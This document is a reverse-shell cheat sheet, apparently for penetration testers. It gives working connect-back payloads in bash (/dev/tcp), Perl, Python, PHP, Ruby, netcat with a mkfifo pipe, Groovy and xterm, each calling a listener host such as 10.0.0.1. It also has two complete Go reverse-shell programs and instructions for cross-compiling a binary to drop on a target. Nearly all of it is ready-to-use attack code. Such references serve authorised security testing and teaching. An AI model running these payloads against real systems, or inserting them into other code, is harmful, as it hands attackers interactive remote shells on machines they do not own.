Some notes on shells and reverse shells. In every example 10.0.0.1 / 1234 stand for the listener's address and port: replace them with your own, and start the listener (e.g. `nc -lvnp 1234`) before running the payload on the target.
Bash (relies on bash's built-in /dev/tcp pseudo-device, so it will not work under a plain sh/dash)
bash -i >& /dev/tcp/10.0.0.52/1234 0>&1
PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
There is also an alternative PERL reverse shell (the link was lost in extraction; see the pentestmonkey cheat sheet listed under "Online resources" below).
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
This assumes the socket opened by fsockopen ends up as file descriptor 3 (hence `<&3 >&3 2>&3`); if the shell does not come back, the descriptor number may differ. If you want a .php file to upload, see the more featureful and robust php-reverse-shell.
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh 10.0.0.1 1234
The `-e` option is not present in every netcat build (the OpenBSD variant shipped by many distributions lacks it). If yours does not have it,
you might still be able to get your reverse shell back by piping the shell through a named pipe like this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Java (the snippet below is actually Groovy syntax — note the untyped assignments and the `as String[]` cast — so it needs a Groovy runtime or translating into plain Java)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
[Untested submission from anonymous reader]
xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X server on display :1 (which listens on TCP port 6001). One way to do this is with Xnest, run on your own system (modern X servers are often started with `-nolisten tcp`, so check that yours actually accepts TCP connections):
Xnest :1
You'll need to authorise the target to connect to you (command also run on your host; this opens your X server to that host, so revoke it afterwards with `xhost -targetip`):
xhost +targetip
GO Reverse shell
https://github.com/sathish09/rev2go
https://blog.jan0ski.net/golang/rev-shell.html
package main
import (
"bufio"
"fmt"
"net"
"os/exec"
"strings"
)
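// main connects back to a hard-coded listener over plain TCP and runs one
// command per received line, returning the command's output (and any error)
// to the listener.
//
// Fixes over the original listing:
//   - the net.Dial error is checked (a failed dial left conn nil and panicked
//     on first use);
//   - the bufio.Reader is created once, not per iteration (a fresh reader
//     each loop silently dropped any bytes already buffered past the first
//     line);
//   - the loop exits on read error instead of spinning forever on EOF after
//     the listener disconnects;
//   - the received line is split into program + arguments, so input like
//     "ls -la" works instead of being treated as one program name.
//
// Note that everything crosses the wire unencrypted; see the TLS variants
// linked at the end of the page if that matters for the engagement.
func main() {
	conn, err := net.Dial("tcp", "10.1.75.200:8081")
	if err != nil {
		// Nothing to report to and nobody listening: just exit.
		return
	}
	defer conn.Close()

	reader := bufio.NewReader(conn)
	for {
		line, err := reader.ReadString('\n')
		if err != nil {
			// io.EOF (listener closed) or a broken connection: stop the loop
			// rather than executing empty commands forever.
			return
		}

		// Fields trims the trailing "\n" (and a "\r" from CRLF clients) and
		// separates the program name from its arguments.
		fields := strings.Fields(line)
		if len(fields) == 0 {
			continue
		}

		// CombinedOutput so stderr reaches the operator too; the plain error
		// string alone ("exit status 1") hides why a command failed.
		out, err := exec.Command(fields[0], fields[1:]...).CombinedOutput()
		if err != nil {
			fmt.Fprintf(conn, "%s\n", err)
		}
		fmt.Fprintf(conn, "%s\n", out)
	}
}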
Go - Advanced shell
Cross-compile for the target platform before dropping the binary (the address in the source is a local placeholder and must be changed first): `GOOS=$target_os GOARCH=$target_arch go build reverse_shell.go`
package main
import (
"net"
"os/exec"
"runtime"
)
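// main dials a listener and hands it an interactive shell whose standard
// streams are wired directly to the socket.
//
// The address is a placeholder: 127.0.0.1:443 only makes sense for a local
// test, so replace host:port before building. The transport is plain TCP —
// everything typed and returned crosses the wire unencrypted.
//
// Fixes over the original listing: an unknown GOOS (e.g. freebsd) no longer
// leaves shell empty, which made exec.Command fail silently; the connection
// is closed on exit; and a failure to run the shell is reported to the
// operator instead of being discarded.
func main() {
	conn, err := net.Dial("tcp", "127.0.0.1:443")
	if err != nil {
		panic(err)
	}
	defer conn.Close()

	// Pick an interpreter for the platform this binary was compiled for.
	var shell string
	switch runtime.GOOS {
	case "windows":
		shell = "cmd.exe"
	case "linux":
		shell = "/bin/sh"
	case "darwin":
		shell = "/bin/bash"
	default:
		// Any other Unix-like target: /bin/sh is the safest assumption.
		shell = "/bin/sh"
	}

	// Point the shell's stdin/stdout/stderr at the socket so the session is
	// fully interactive rather than one command per line.
	cmd := exec.Command(shell)
	cmd.Stdin = conn
	cmd.Stdout = conn
	cmd.Stderr = conn
	if err := cmd.Run(); err != nil {
		// Tell the operator why the shell did not start or exited abnormally;
		// the original swallowed this and just disconnected.
		conn.Write([]byte(err.Error() + "\n"))
	}
}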
Online resources
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://highon.coffee/blog/reverse-shell-cheat-sheet/
https://golangexample.com/one-liner-reverse-shell-generator/
https://golangexample.com/girsh-golang-interactive-reverse-shell/
https://golangexample.com/reverse-shell-over-tls-in-golang/
https://golangexample.com/go-encrypted-reverse-tcp-shell/
https://golangexample.com/statically-linked-ssh-server-with-reverse-shell-functionality-for-ctfs-and-such/